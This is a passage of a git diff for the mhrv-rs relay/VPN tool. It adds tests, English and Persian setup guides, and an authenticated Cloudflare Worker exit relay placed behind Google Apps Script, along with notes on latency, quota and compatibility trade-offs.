+  0x03, 0x63, 0x6f, 0x6d, 0x00,
+  0x00, 0x01, 0x00, 0x01,
+  0xc0, 0x0c,
+  0x00, 0x01, 0x00, 0x01,
+  0x80, 0x00, 0x00, 0x00,                                   // TTL with top bit set
+  0x00, 0x04,
+  0x01, 0x02, 0x03, 0x04,
+]);
+console.log('TEST 8 TTL with high bit → clamped to 0');
+const t8 = ctx._dnsMinTtl(reply8);
+check('TTL clamped to 0 (not negative, not 2^31+)', t8 === 0, 'got ' + t8);
+ok();
+
+// --- 9. splice: forwarded results land at original op indices ---
+console.log('TEST 9 splice into mixed-batch slots');
+// Simulate a 5-op batch where indices 1 and 3 were served locally as DNS
+// hits, indices 0/2/4 were forwarded as TCP ops.
+const allResults = new Array(5);
+allResults[1] = { sid: 'edns-cache-1', pkts: ['A'], eof: true };
+allResults[3] = { sid: 'edns-doh-3',   pkts: ['B'], eof: true };
+const forwardIdx = [0, 2, 4];
+const forwardedResults = [
+  { sid: 'tcp-0', d: 'X' },
+  { sid: 'tcp-2', d: 'Y' },
+  { sid: 'tcp-4', d: 'Z' },
+];
+const merged = ctx._spliceTunnelResults(forwardIdx, forwardedResults, allResults);
+check('slot 0 from tunnel', merged[0].sid === 'tcp-0');
+check('slot 1 from cache',  merged[1].sid === 'edns-cache-1');
+check('slot 2 from tunnel', merged[2].sid === 'tcp-2');
+check('slot 3 from doh',    merged[3].sid === 'edns-doh-3');
+check('slot 4 from tunnel', merged[4].sid === 'tcp-4');
+check('returns same array', merged === allResults);
+ok();
+
+// --- 10. splice when nothing is forwarded ---
+console.log('TEST 10 splice with empty forward list');
+const allDns = [{ sid: 'a' }, { sid: 'b' }];
+const result10 = ctx._spliceTunnelResults([], [], allDns);
+check('no mutation', result10[0].sid === 'a' && result10[1].sid === 'b');
+ok();
+
+// --- 11. splice when everything is forwarded ---
+console.log('TEST 11 splice with everything forwarded');
+const empty = new Array(3);
+const result11 = ctx._spliceTunnelResults(
+  [0, 1, 2],
+  [{ sid: 'x' }, { sid: 'y' }, { sid: 'z' }],
+  empty,
+);
+check('all filled', result11[0].sid === 'x' && result11[2].sid === 'z');
+ok();
+
+console.log('\n' + passed + ' tests passed');
diff --git a/assets/cloudflare/README.fa.md b/assets/cloudflare/README.fa.md
new file mode 100644
index 00000000..4b183940
--- /dev/null
+++ b/assets/cloudflare/README.fa.md
@@ -0,0 +1,110 @@
+<div dir="rtl">
+
+# خروجی Cloudflare Worker (پشتیبان جایگزین برای Apps Script)
+
+> *English: [README.md](README.md)*
+
+این پوشه یک **Cloudflare Worker** ارائه می‌کند که همراه با [`assets/apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) شکل متفاوتی از حالت `apps_script` به شما می‌دهد:
+
+```
+mhrv-rs ──► Apps Script (Code.cfw.gs) ──► Cloudflare Worker ──► مقصد
+            ▲ فقط احراز هویت و فوروارد       ▲ گرفتن داده + base64
+```
+
+پشتیبان استاندارد ([`assets/apps_script/Code.gs`](../apps_script/Code.gs)) خودِ `Apps Script` کار `fetch` به مقصد را انجام می‌دهد. این نسخه‌ٔ جایگزین، `Apps Script` را به یک رلهٔ نازک تبدیل می‌کند و کارِ اصلی را به لبهٔ `Cloudflare` می‌سپارد. **خود `mhrv-rs` تغییر نمی‌کند** — همان پاکت `JSON` روی سیم، همان `mode: "apps_script"` در `config.json`، همان `script_id`. تنها تفاوت این است که `Apps Script` مستقر شدهٔ شما بعد از احراز هویت چه می‌کند.
+
+ایدهٔ اصلی: <https://github.com/denuitt1/mhr-cfw>. این کپی یک بررسی `AUTH_KEY` روی خود `Worker` اضافه می‌کند، رفتار «صفحهٔ تقلبی برای کلید نامعتبر» را از `Code.gs` به ارث می‌برد، و یک محافظ در برابر حلقه‌شدن دارد.
+
+## چه‌وقت ارزش راه‌اندازی دارد؟
+
+✅ مرور وب، باز کردن صفحات جدید، ترافیک گفتگومحور — به‌طور محسوسی سریع‌تر می‌شود. تأخیر هر تماس از کف ۲۵۰ تا ۵۰۰ میلی‌ثانیه‌ٔ `Apps Script` به ۱۰ تا ۵۰ میلی‌ثانیه‌ٔ لبهٔ `Cloudflare` کاهش می‌یابد.
+
+✅ تلگرام بلادرنگ — پیام‌های کوتاه و مکرر بیشترین سود را می‌برند.
+
+✅ شبکه‌هایی که در آن‌ها ابتدا سهمیهٔ **زمان اجرای `Apps Script`** (۹۰ دقیقه در روز برای حساب‌های مصرفی گوگل) تمام می‌شود، نه شمارش `URL fetch`. در این حالت `GAS` تقریباً هیچ زمانی صرف هر تماس نمی‌کند.
+
+❌ **امروز هیچ کاهشی در شمارش روزانهٔ `UrlFetchApp` به دست نمی‌آورید.** مسیر رلهٔ `HTTP` در `mhrv-rs` همیشه فقط یک پاکت تک‌آدرسی می‌فرستد و هیچ‌گاه شکل دسته‌ای `q: [...]` را تولید نمی‌کند، پس هر درخواست کاربر همچنان یک `UrlFetchApp` در `GAS` مصرف می‌کند — مستقل از اینکه کدام نسخهٔ `Code.gs` را مستقر کرده باشید. مسیر `Code.cfw.gs` به سمت `Worker` *قابلیت* پشتیبانی از دسته را دارد (قطعه‌بندی ۴۰‌تایی، پخش‌سازی روی `Worker` با `Promise.all`، هزینهٔ `ceil(N / 40)` به جای `N`)، ولی این شاخه از هیچ کلاینت موجودی فراخوانی نمی‌شود. **تا زمانی که `mhrv-rs` خودش `HTTP relay` را دسته‌بندی نکند، سقف روزانهٔ ~۲۰٬۰۰۰ مصرف نسبت به `Code.gs` تغییر نمی‌کند.** این پشتیبانی برای سازگاری آینده در کد نگه داشته شده — هزینه‌ای ندارد و روزی که کلاینتِ دسته‌بندی‌کننده برسد، خود به خود فعال می‌شود.
+
+❌ ویدیوهای طولانی یوتیوب — **بدتر** می‌شود، نه بهتر. `Apps Script` تا حدود ۶ دقیقه دیوار اجرا (`wall`) به ازای هر فراخوانی می‌دهد؛ `Cloudflare Workers` در ۳۰ ثانیه قطع می‌کنند. صخرهٔ `SABR` زودتر فرا می‌رسد. برای استفادهٔ یوتیوب‌محور، روی `Code.gs` بمانید.
+
+❌ سایت‌هایی که پشت ضدبات `Cloudflare` هستند (توییتر/`X`، `OpenAI`، …) — `IP` خروجی حالا داخل خود `Cloudflare` است، که ضدبات `Cloudflare` آن را به‌عنوان «درخواست داخلی `Worker`» انگشت‌نگاری می‌کند. اغلب **سختگیرانه‌تر** از `IP` گوگل برخورد می‌شود. این مشکلی جدا از عبور از `DPI` است و هیچ‌کدام از این دو نسخه آن را حل نمی‌کنند.
+
+❌ اگر/زمانی که `HTTP relay` دسته‌ای فعال شود، سقف ۳۰ ثانیه‌ٔ `Cloudflare` روی **کندترین آدرس در هر قطعه** اعمال خواهد شد، نه به‌ازای هر `URL` — یک مقصد قفل‌شده می‌تواند کل قطعهٔ ۴۰ آدرسی را به `timeout` بکشاند. تلاش مجدد تک‌به‌تک در `mhrv-rs` این را پوشش می‌دهد، اما تفاوت رفتاری نسبت به دیوار `per-URL` در `fetchAll` استانداردِ `Code.gs` است. (امروز بی‌اثر است چون کلاینت دسته نمی‌فرستد.)
+
+## راه‌اندازی
+
+سه رشتهٔ هم‌خوان نیاز دارید: یک `AUTH_KEY` که بین `worker.js`، `Code.cfw.gs` و `config.json` خود `mhrv-rs` مشترک است. یک رمز تصادفی قوی انتخاب کنید و در هر سه جا paste کنید.
+
+### ۱. استقرار `Worker`
+
+۱. وارد <https://dash.cloudflare.com/> شوید → **`Workers & Pages`** → **`Create`** → **`Hello World`** → **`Deploy`**.
+۲. روی **`Edit code`** بزنید، کد پیش‌فرض را پاک کنید و محتوای [`worker.js`](worker.js) را paste کنید.
+۳. ثابت `AUTH_KEY` در بالای فایل را به رمز قوی خودتان تغییر دهید.
+۴. روی **`Deploy`** بزنید. آدرس `*.workers.dev` را کپی کنید — در مرحلهٔ بعد لازم است.
+
+### ۲. استقرار `Apps Script`
+
+۱. وارد <https://script.google.com> با حساب گوگلتان شوید → **`New project`** → کد پیش‌فرض را پاک کنید.
+
+۲. محتوای [`../apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) را paste کنید.
+
+۳. هر دو ثابت بالای فایل را تنظیم کنید:
+   - مقدار `AUTH_KEY` را همان رمزی بگذارید که در `worker.js` گذاشتید.
+   - مقدار `WORKER_URL` را آدرس کامل `https://…workers.dev` همان `Worker` که الان مستقر کردید بگذارید (حتماً با پیشوند `https://`).
+
+۴. از مسیر **`Deploy → New deployment → Web app`** استقرار را شروع کنید: مقدار `Execute as` را روی **`Me`** و `Who has access` را روی **`Anyone`** بگذارید.
+
+۵. سپس **`Deployment ID`** را کپی کنید.
+
+### ۳. اشاره دادن `mhrv-rs` به این `Apps Script`
+
+در `config.json` (یا از طریق فرم `UI`):
+
+```json
+{
+  "mode": "apps_script",
+  "script_id": "PASTE_DEPLOYMENT_ID_HERE",
+  "auth_key": "SAME_SECRET_AS_BOTH_FILES_ABOVE"
+}
+```
+
+تمام. `mhrv-rs` لازم نیست بداند `Cloudflare` در کار است؛ از نگاه او این `script_id` مثل هر `Deployment` دیگری رفتار می‌کند. اگر چند `Deployment` دارید (بعضی استاندارد، بعضی `CFW`)، می‌توانید همه را در `script_ids: [...]` بگذارید — `round-robin` و `parallel-relay` همچنان روی همه‌شان کار می‌کند.
+
+## چرا هر سه `AUTH_KEY` باید یکی باشند؟
+
+- **بین `mhrv-rs` و `Apps Script`**: جلوی این را می‌گیرد که هر `POST` تصادفی روی آدرس `*.googleusercontent.com` شما رله شود. درخواست‌هایی که این کلید را نداشته باشند، یک صفحهٔ `HTML` تقلبی می‌گیرند (به‌خاطر `DIAGNOSTIC_MODE = false` در `Code.cfw.gs`) و `Deployment` شما به‌جای یک تونل، شبیه یک پروژهٔ فراموش‌شده دیده می‌شود.
+- **بین `Apps Script` و `Worker`**: اگر آدرس `Worker` لو برود، جلوی این را می‌گیرد که به یک رلهٔ `HTTP` باز برای مهاجم تبدیل شود. بدون این بررسی، `Worker` شما برای هر کسی که `URL` را پیدا کند، قابل سوءاستفاده است. نسخهٔ بالادست `mhr-cfw` این بررسی را ندارد؛ این کپی آن را اضافه می‌کند.
+
+اگر می‌خواهید برای امنیت بیشتر روی هر بخش رمز جدا داشته باشید، `Code.cfw.gs` را ویرایش کنید تا یک `k` متفاوت از آن چیزی که از `mhrv-rs` می‌گیرد به `Worker` بفرستد. تنظیم تک‌رمز ساده‌ترین حالتِ درست است.
+
+## بررسی اینکه کار می‌کند
+
+همان روش پشتیبان استاندارد: <https://ipleak.net> را از طریق پروکسی باز کنید. باید یک `IP` متعلق به `Cloudflare` ببینید (چون `fetch` واقعی حالا از شبکهٔ `Cloudflare` خارج می‌شود)، نه یک `IP` متعلق به گوگل که با `Code.gs` می‌دیدید. اگر `IP` واقعی خودتان را ببینید، پروکسی استفاده نمی‌شود؛ اگر `IP` گوگل ببینید، اشتباهاً `Code.gs` را به‌جای `Code.cfw.gs` مستقر کرده‌اید.
+
+دکمهٔ **`Test`** در `UI` دسکتاپ همچنان کار می‌کند — یک درخواست `HEAD` از طریق هر `Apps Script Deployment` که تنظیم کرده‌اید رله می‌کند.
+
+## جدول مقایسه در یک نگاه
+
+| محور | `Code.gs` (استاندارد) | `Code.cfw.gs` (این نسخه) |
+|---|---|---|
+| کف تأخیر هر تماس | ۲۵۰–۵۰۰ میلی‌ثانیه (هاپ داخلی `GAS`) | ۱۰–۵۰ میلی‌ثانیه (لبهٔ `CF`) |
+| سهمیهٔ `UrlFetchApp` در روز، **آنچه `mhrv-rs` امروز می‌فرستد** | ۱ سهمیه به‌ازای هر درخواست | ۱ سهمیه به‌ازای هر درخواست — یکسان (`mhrv-rs` فقط پاکت تک‌آدرسی تولید می‌کند) |
+| سهمیهٔ `UrlFetchApp` در روز، **اگر کلاینتی در آینده دسته بفرستد** | تعداد `N` سهمیه (یکی برای هر آدرس از طریق `fetchAll`) | تعداد `ceil(N / 40)` سهمیه (قطعه‌بندی ۴۰‌تایی؛ پخش‌سازی روی `Worker` با `Promise.all`) |
+| سقف درخواست `Cloudflare Workers` در روز (پلن رایگان) | ندارد | ۱۰۰٬۰۰۰ — بسیار بالاتر از چیزی که `GAS` می‌تواند تغذیه‌اش کند؛ گلوگاه نیست |
+| سهمیهٔ زمان اجرای `Apps Script` در روز | ۹۰ دقیقه، اغلب گلوگاه | ۹۰ دقیقه، به‌ندرت گلوگاه |
+| دیوار اجرای هر فراخوانی | ~۶ دقیقه، به‌ازای هر آدرس | ۳۰ ثانیه، به‌ازای هر تماس (اگر دسته‌بندی فعال شود، به‌ازای هر قطعه) |
+| سقف اندازهٔ پاسخ | ~۵۰ مگابایت (مستندات `Apps Script`) | محدود به حافظهٔ `Worker` (۱۲۸ مگابایت در پلن رایگان)؛ در عمل با تبدیل `base64` چند ده مگابایت |
+| حروف بزرگ/کوچک هدرهای پاسخ | همان‌طور که مبدأ فرستاده | کاملاً کوچک می‌شود (`Headers.forEach` در `Workers` نرمال می‌کند). فقط برای ابزارهای پایین‌دستی که نام هدر را حساس به حروف مقایسه می‌کنند مهم است؛ `mhrv-rs` خود حساس به حروف نیست. |
+| پخش ویدیوی طولانی یوتیوب | قابل قبول (صخرهٔ ۶ دقیقه) | بدتر (صخرهٔ ۳۰ ثانیه) |
+| سرعت تلگرام / گفتگو | پایه | محسوساً بهتر |
+| ضدبات `Cloudflare` روی مقصد | یک `IP` دیتاسنتر | یک `IP` داخلی `Worker` (اغلب سخت‌گیرانه‌تر) |
+| کش پاسخ روی `Spreadsheet` | موجود (اختیاری) | در این نسخه نیست |
+| پیچیدگی استقرار | ۱ چیز برای نگه‌داری | ۲ چیز که باید همگام بمانند |
+
+اگر این مبادلات به نفع شماست، این نسخه را مستقر کنید. اگر نیست — یا حساب `Cloudflare` ندارید — روی `Code.gs` بمانید.
+
+## محدودیت مهم: این نسخه با `mode: "full"` کار نمی‌کند
+
+این فایل فقط مسیر **رلهٔ `HTTP`** (حالت‌های ۱ و ۲ در `CodeFull.gs`) را پورت می‌کند. عملیات تونل `TCP/UDP` خام (حالت‌های ۳ و ۴ در `CodeFull.gs` که برای `mode: "full"` و کاربری اپلیکیشن‌های موبایل مثل واتس‌اَپ روی اندروید لازم‌اند) در `Code.cfw.gs` پشتیبانی نمی‌شوند. اگر در حالت `full` هستید و `WhatsApp` کند است، این تغییر کمکی نمی‌کند — این مسئلهٔ متفاوتی است که نیاز به طراحی جداگانه دارد.
+
+</div>
diff --git a/assets/cloudflare/README.md b/assets/cloudflare/README.md
new file mode 100644
index 00000000..403fe81b
--- /dev/null
+++ b/assets/cloudflare/README.md
@@ -0,0 +1,97 @@
+# Cloudflare Worker exit (alternative Apps Script backend)
+
+> *فارسی: [README.fa.md](README.fa.md)*
+
+This directory ships a **Cloudflare Worker** that pairs with [`assets/apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) to give you a different shape of `apps_script` mode:
+
+```
+mhrv-rs ──► Apps Script (Code.cfw.gs) ──► Cloudflare Worker ──► target
+            ▲ thin auth + forward          ▲ outbound fetch + base64
+```
+
+The standard backend (`assets/apps_script/Code.gs`) does the outbound fetch from inside Apps Script directly. This variant makes Apps Script a thin relay and pushes the actual fetch to Cloudflare's edge. **mhrv-rs itself is unchanged** — same JSON envelope on the wire, same `mode: "apps_script"` in `config.json`, same `script_id`. The only thing that's different is what your deployed Apps Script does after it authenticates the request.
+
+Original idea: <https://github.com/denuitt1/mhr-cfw>. This copy adds an `AUTH_KEY` check on the Worker, the decoy-on-bad-auth treatment from `Code.gs`, and a hop-loop guard.
+
+## When this is worth it
+
+✅ Browsing, page navigation, chat-style traffic — visibly snappier. Per-call latency drops from the ~250-500 ms Apps Script floor to ~10-50 ms at the CF edge.
+✅ Telegram realtime — small frequent messages benefit most.
+✅ Networks where the Apps Script *runtime* quota (90 min/day on consumer Google accounts) is what you hit before the URL-fetch count cap. GAS spends almost no time per call here.
+
+❌ **No `UrlFetchApp` daily-count relief today.** mhrv-rs's HTTP relay path emits a single-URL envelope per request, never the `q: [...]` batch shape, so each user request still consumes one GAS UrlFetchApp call regardless of which `Code.gs` variant is deployed. The `Code.cfw.gs` ↔ Worker path *is* batch-aware (chunks at 40, Worker fans out via `Promise.all`, costs `ceil(N / 40)` per batch instead of N), but that branch is unreachable from any shipping client. **Until/unless mhrv-rs grows HTTP-relay batching, the daily 20k-fetch ceiling is unchanged from `Code.gs`.** The ready batching support is left in place for forward compatibility — it costs nothing and goes live the day a batching client lands.
+❌ YouTube long-form video — gets **worse**, not better. Apps Script allows ~6 min wall per execution; CF Workers cap at 30 s. The SABR cliff arrives sooner. Stay on `Code.gs` for YouTube-heavy use.
+❌ Sites behind Cloudflare anti-bot (Twitter/X, OpenAI, etc.) — exit IP becomes a Workers IP, which CF's own anti-bot fingerprints as a worker-internal request. Often *stricter* than a Google IP. This is a separate problem from DPI bypass and neither variant fixes it.
+❌ When/if HTTP-relay batching ships, the 30 s wall would apply to **the slowest URL in each chunk**, not per-URL — a single hung target could drag a 40-URL chunk to timeout. mhrv-rs's existing per-item retry would absorb this, but it's a behavioral change vs the per-URL `fetchAll` wall under `Code.gs`. (Inert today since no batching client exists.)
+
+## Setup
+
+You need three matching strings: an `AUTH_KEY` shared between `worker.js`, `Code.cfw.gs`, and your `mhrv-rs` `config.json`. Pick a strong random secret once and paste it into all three.
+
+### 1. Deploy the Worker
+
+1. Open <https://dash.cloudflare.com/> → **Workers & Pages** → **Create** → **Hello World** → **Deploy**.
+2. Click **Edit code**, delete the template, and paste the contents of [`worker.js`](worker.js).
+3. Change the `AUTH_KEY` constant near the top of the file to your strong secret.
+4. **Deploy**. Copy the `*.workers.dev` URL — you'll need it next.
+
+### 2. Deploy the Apps Script
+
+1. Open <https://script.google.com> while signed into your Google account → **New project** → delete the default code.
+2. Paste the contents of [`../apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs).
+3. Set both constants at the top:
+   - `AUTH_KEY` — the same secret you set in `worker.js`.
+   - `WORKER_URL` — the full `https://…workers.dev` URL of the Worker you just deployed (must include the scheme).
+4. **Deploy → New deployment → Web app**: *Execute as* = **Me**, *Who has access* = **Anyone**.
+5. Copy the **Deployment ID**.
+
+### 3. Point mhrv-rs at the Apps Script
+
+In `config.json` (or via the UI's config form):
+
+```json
+{
+  "mode": "apps_script",
+  "script_id": "PASTE_DEPLOYMENT_ID_HERE",
+  "auth_key": "SAME_SECRET_AS_BOTH_FILES_ABOVE"
+}
+```
+
+That's it. mhrv-rs doesn't need to know Cloudflare exists; from its perspective, the `script_id` deployment behaves like any other. If you have multiple deployments (some plain, some CFW), `script_ids: [...]` round-robins across all of them and the parallel-relay fan-out still works.
+
+## Why three matching `AUTH_KEY`s
+
+- **mhrv-rs ↔ Apps Script**: prevents random POSTs to your `*.googleusercontent.com` deployment from being relayed. Probes that don't carry the key get the decoy HTML page (`DIAGNOSTIC_MODE = false` in `Code.cfw.gs`), so the deployment looks like a forgotten placeholder rather than a tunnel.
+- **Apps Script ↔ Worker**: prevents random POSTs to your `*.workers.dev` Worker from being relayed if the Worker URL ever leaks. Without this check the Worker becomes an open HTTP-relay for arbitrary attackers. The upstream `mhr-cfw` Worker omits it; this copy adds it back.
+
+If you want compartmentalization (different secret on each leg), edit `Code.cfw.gs` to send a different `k` to the Worker than the one it accepts from mhrv-rs. The single-secret setup is the simplest correct configuration.
+
+## Verifying it works
+
+Same procedure as the standard backend: open <https://ipleak.net> through the proxy. You should see a Cloudflare-owned IP (since the actual fetch now exits Cloudflare's network), not a Google-owned one as you would with `Code.gs`. If you see your real IP, the proxy isn't being used; if you see a Google IP, you deployed `Code.gs` instead of `Code.cfw.gs`.
+
+The `Test` button in the desktop UI still works — it does a HEAD relay through whichever Apps Script deployment you configured.
+
+## Trade-off table at a glance
+
+| Axis | `Code.gs` (standard) | `Code.cfw.gs` (this variant) |
+|---|---|---|
+| Per-call latency floor | ~250-500 ms (GAS internal hop) | ~10-50 ms (CF edge) |
+| Apps Script `UrlFetchApp`/day, **what mhrv-rs sends today** | 1 quota / request | 1 quota / request — same (mhrv-rs only emits single-URL envelopes) |
+| Apps Script `UrlFetchApp`/day, **if a future client batches** | N quota (one per URL via `fetchAll`) | `ceil(N / 40)` quota (chunks at 40, Worker fans out via `Promise.all`) |
+| CF Workers requests/day (free tier) | n/a | 100 000 — far above what GAS can feed it; not the binding ceiling |
+| Apps Script runtime/day | 90 min, often binding | 90 min, rarely binding |
+| Per-execution wall budget | ~6 min, per-URL | 30 s, per-call (would become per-chunk if batching ships) |
+| Per-response size cap | ~50 MB (Apps Script doc'd) | bounded by Worker memory (128 MB free tier); ~tens of MB in practice with the base64 conversion |
+| Response header casing | preserved as origin sent it | lowercased (Workers' `Headers.forEach` normalises). Matters only for downstream tools that compare header names case-sensitively; mhrv-rs is case-insensitive. |
+| YouTube long-form playback | OK (6-min cliff) | WORSE (30-s cliff) |
+| Telegram / chat snappiness | baseline | noticeably better |
+| Cloudflare anti-bot on target | datacenter IP | worker-internal IP (often stricter) |
+| Spreadsheet response cache | available (opt-in) | not in this variant |
+| Deployment complexity | 1 thing to maintain | 2 things to keep in sync |
+
+If those trade-offs land on the right side for you, deploy this variant. If not — or if you don't have a Cloudflare account — stay on `Code.gs`.
+
+## Important limitation: not compatible with `mode: "full"`
+
+`Code.cfw.gs` only ports the HTTP-relay path (modes 1 + 2 in `CodeFull.gs`). The raw-TCP/UDP tunnel ops that `mode: "full"` depends on (modes 3 + 4 in `CodeFull.gs` — required for Android full-mode coverage of WhatsApp / Telegram / messengers / any non-HTTPS-MITM-able app) are **not** ported. If you're on full mode and looking for messenger speed-ups, this variant won't help — that's a different design that would need to ride on top of Cloudflare's TCP Sockets API + Durable Objects, with no equivalent for UDP. See the discussion in [issue #380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380) for context.
diff --git a/assets/cloudflare/worker.js b/assets/cloudflare/worker.js
new file mode 100644
index 00000000..f672194b
--- /dev/null
+++ b/assets/cloudflare/worker.js
@@ -0,0 +1,302 @@
+/**
+ * MHR-CFW Exit Worker — Cloudflare Workers companion to Code.cfw.gs.
+ *
+ * Architecture (alternative backend, opt-in):
+ *   mhrv-rs → Apps Script (Code.cfw.gs) → THIS Worker → target site
+ *
+ * Apps Script in this configuration is a thin relay: it authenticates
+ * the inbound request from mhrv-rs, then forwards to this Worker. The
+ * Worker does the actual outbound fetch(es), base64-encodes the body,
+ * and returns the same JSON envelope shape the standard Code.gs would
+ * have returned. The mhrv-rs client is unaware that the work happened
+ * on Cloudflare — same `{u, m, h, b, ct, r}` request, same `{s, h, b}`
+ * response.
+ *
+ * Two request shapes are accepted:
+ *   1. Single:  { k, u, m, h, b, ct, r }            → { s, h, b }
+ *   2. Batch:   { k, q: [{u,m,h,b,ct,r}, ...] }     → { q: [{s,h,b} | {e}, ...] }
+ *
+ * The batch shape is what makes this design actually save Apps Script
+ * UrlFetchApp quota. Without it, Code.cfw.gs would have to do
+ * `UrlFetchApp.fetchAll(N worker calls)` to fan out an N-URL batch,
+ * which costs N quota — same as the standard Code.gs. With it,
+ * Code.cfw.gs does ONE fetch to this Worker (1 quota) and we fan out
+ * inside the Worker via Promise.all. For a typical mhrv-rs batch of
+ * 5-30 URLs that's a 5-30x reduction in GAS daily quota.
+ *
+ * Why bother:
+ *   - Faster per-call latency (~10-50 ms at CF edge vs ~250-500 ms in
+ *     Apps Script), which matters most for many small requests
+ *     (Telegram realtime, page navigation chatter).
+ *   - Apps Script *runtime* quota (90 min/day on consumer accounts)
+ *     stretches further because GAS spends each call almost entirely
+ *     on its single forward to the Worker rather than on body fetch
+ *     + base64 + header munging.
+ *   - With the batch shape (above), Apps Script *UrlFetchApp count*
+ *     quota also stretches roughly Nx for an N-URL batch — typically
+ *     5-30x for mhrv-rs.
+ *
+ * What this does NOT change:
+ *   - Cloudflare anti-bot challenges on the destination. The exit IP
+ *     becomes a Workers IP (inside Cloudflare's network), which CF's
+ *     own anti-bot can fingerprint as a worker-internal request —
+ *     often *stricter* than a Google IP. This is a different problem
+ *     than DPI bypass; see docs.
+ *   - YouTube long-form streaming gets WORSE, not better. Apps Script
+ *     allows ~6 min wall per execution; CF Workers cap at 30s wall.
+ *     The SABR cliff arrives sooner. Keep the standard `apps_script`
+ *     mode (Code.gs) for YouTube-heavy use.
+ *   - The 30s wall now applies to the *slowest URL in the batch*
+ *     because Promise.all only resolves once every fetch finishes.
+ *     mhrv-rs already retries failed batch items individually, so a
+ *     single slow target degrades to a per-item timeout rather than
+ *     a hard failure — but it's a real behavioural difference vs the
+ *     per-URL wall under the standard Code.gs path.
+ *
+ * Deployment:
+ *   1. Cloudflare dashboard → Workers & Pages → Create → Hello World
+ *   2. Edit code → delete the template, paste this entire file
+ *   3. Change AUTH_KEY below to the same value you set in Code.cfw.gs
+ *      AND in your mhrv-rs config.json (auth_key). All three must match.
+ *   4. Deploy. Note the *.workers.dev URL; paste it into Code.cfw.gs as
+ *      WORKER_URL.
+ *
+ * SECURITY NOTE: this Worker accepts unauthenticated POSTs from anyone
+ * who knows the URL unless AUTH_KEY is changed. The check below is
+ * cheap; do not skip it. The point of the AUTH_KEY is to keep the
+ * Worker from becoming an open HTTP-relay for arbitrary attackers if
+ * its URL leaks. Same secret as Code.cfw.gs by convention — if you
+ * want compartmentalisation, use a different one and have Code.cfw.gs
+ * forward both keys.
+ *
+ * Hardened over the upstream mhr-cfw worker.js by adding the AUTH_KEY
+ * check and batch handling. Upstream credit: github.com/denuitt1/mhr-cfw.
+ */
+
+const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
+const DEFAULT_AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
+
+// Loop-prevention tag. The Worker tags its OUTBOUND request to the
+// target with `x-relay-hop: 1` (see processOne). If a subsequent
+// request comes back into the Worker with that header set, the Worker
+// has been chained back to itself somehow — most likely the user's
+// `item.u` resolved to this Worker's own URL. Bail out instead of
+// fetching to avoid a stack-overflow loop.
+//
+// Note: Code.cfw.gs does NOT set this header on its GAS→Worker call
+// (and could not check for it on inbound anyway — Apps Script's
+// doPost event doesn't expose request headers). So this guard
+// catches Worker-↔-Worker cycles, not GAS-↔-Worker cycles. The
+// `targetUrl.hostname === selfHost` check in processOne is the
+// primary defence for the common misconfiguration.
+const RELAY_HOP_HEADER = "x-relay-hop";
+
+// Soft cap on batch size. Cloudflare Workers allow up to 50
+// subrequests per invocation on the free tier (1000 on paid). We
+// keep a margin for retries and internal CF traffic. mhrv-rs's
+// typical batches are 5-30 URLs so this is rarely the binding limit.
+//
+// **Must match `WORKER_BATCH_CHUNK` in Code.cfw.gs.** If the GAS side
+// chunks at a different size, oversized chunks here return a top-level
+// error and the entire chunk's slots fail. Tune both together.
+const MAX_BATCH_SIZE = 40;
+
+// Hop-by-hop headers and headers Cloudflare manages itself. Stripped
+// before forwarding so the inbound request doesn't poison the outbound.
+// Kept in sync with Code.cfw.gs / Code.gs SKIP_HEADERS so the Worker
+// is correct as a defence-in-depth even when called directly (the
+// AUTH_KEY check is the primary gate, but GAS scrubs first in the
+// normal flow).
+const SKIP_HEADERS = new Set([
+  "host",
+  "connection",
+  "content-length",
+  "transfer-encoding",
+  "proxy-connection",
+  "proxy-authorization",
+  "priority",
+  "te",
+]);
+
+export default {
+  async fetch(request) {
+    // Fail-closed if the deployer forgot to change AUTH_KEY from the
+    // template default. Without this guard a forgotten edit would
+    // accept any client that also happens to send the placeholder —
+    // effectively running as an open relay. Prefer a loud 500 over
+    // a silent open door.
+    if (AUTH_KEY === DEFAULT_AUTH_KEY) {
+      return json({ e: "configure AUTH_KEY in worker.js" }, 500);
+    }
+
+    if (request.method !== "POST") {
+      return json({ e: "method not allowed" }, 405);
+    }
+
+    if (request.headers.get(RELAY_HOP_HEADER) === "1") {
+      return json({ e: "loop detected" }, 508);
+    }
+
+    let req;
+    try {
+      req = await request.json();
+    } catch (_err) {
+      return json({ e: "bad json" }, 400);
+    }
+
+    if (!req || req.k !== AUTH_KEY) {
+      // Same shape as Code.cfw.gs unauthorized so downstream errors are
+      // uniform. The Worker URL is generally not user-discoverable; the
+      // GAS in front of it is the public surface, and probes hit GAS
+      // first. We don't bother with the decoy-HTML treatment here.
+      return json({ e: "unauthorized" }, 401);
+    }
+
+    const selfHost = new URL(request.url).hostname;
+
+    // Batch mode: { k, q: [{u,m,h,b,ct,r}, ...] }. Process all items in
+    // parallel via Promise.all. Per-item failures are per-item `{e}`s in
+    // the response array; the envelope itself stays 200 unless the batch
+    // is malformed at the top level.
+    if (Array.isArray(req.q)) {
+      if (req.q.length === 0) return json({ q: [] });
+      if (req.q.length > MAX_BATCH_SIZE) {
+        return json({
+          e: "batch too large (" + req.q.length + " > " + MAX_BATCH_SIZE + ")",
+        }, 400);
+      }
+      const results = await Promise.all(
+        req.q.map((item) => processOne(item, selfHost).catch((err) => ({
+          e: "fetch failed: " + String(err),
+        })))
+      );
+      return json({ q: results });
+    }
+
+    // Single mode: { k, u, m, h, b, ct, r }
+    let result;
+    try {
+      result = await processOne(req, selfHost);
+    } catch (err) {
+      return json({ e: "fetch failed: " + String(err) }, 502);
+    }
+    if (result.e) {
+      // Per-item validation errors get HTTP 400 in single mode so
+      // mhrv-rs sees the same shape as in standard Code.gs ("bad url"
+      // etc are already client-error-coded there).
+      return json(result, 400);
+    }
+    return json(result);
+  },
+};
+
+/**
+ * Process one item, whether it came in as the top-level single
+ * request or as one slot of a batch. Returns a plain object — never
+ * throws to the caller; Promise.all's .catch above only triggers on
+ * exceptions from this function's own internals (programmer error).
+ *
+ * Result shape mirrors what Code.gs would return for the same item:
+ *   - Success: { s: status, h: {...}, b: base64Body }
+ *   - Validation / fetch failure: { e: "..." }
+ */
+async function processOne(item, selfHost) {
